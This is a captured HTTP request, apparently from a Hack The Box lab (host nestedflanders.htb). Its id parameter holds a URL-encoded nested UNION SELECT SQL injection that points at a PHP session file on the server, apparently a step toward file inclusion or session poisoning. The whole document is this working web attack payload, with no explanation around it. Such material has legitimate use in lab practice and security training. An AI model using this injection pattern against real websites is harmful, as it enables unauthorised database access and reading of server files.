GET /index.php?id=587%27%20UNION%20(SELECT%20%27contact\%27%20UNION%20(SELECT%20\%27/var/lib/php/sessions/sess_903lbmi3k7qavrkr9pbkudb093\%27%20FROM%20filepath)--%20%27)--+ HTTP/1.1
Host: www.nestedflanders.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=903lbmi3k7qavrkr9pbkudb093
Connection: close
Upgrade-Insecure-Requests: 1

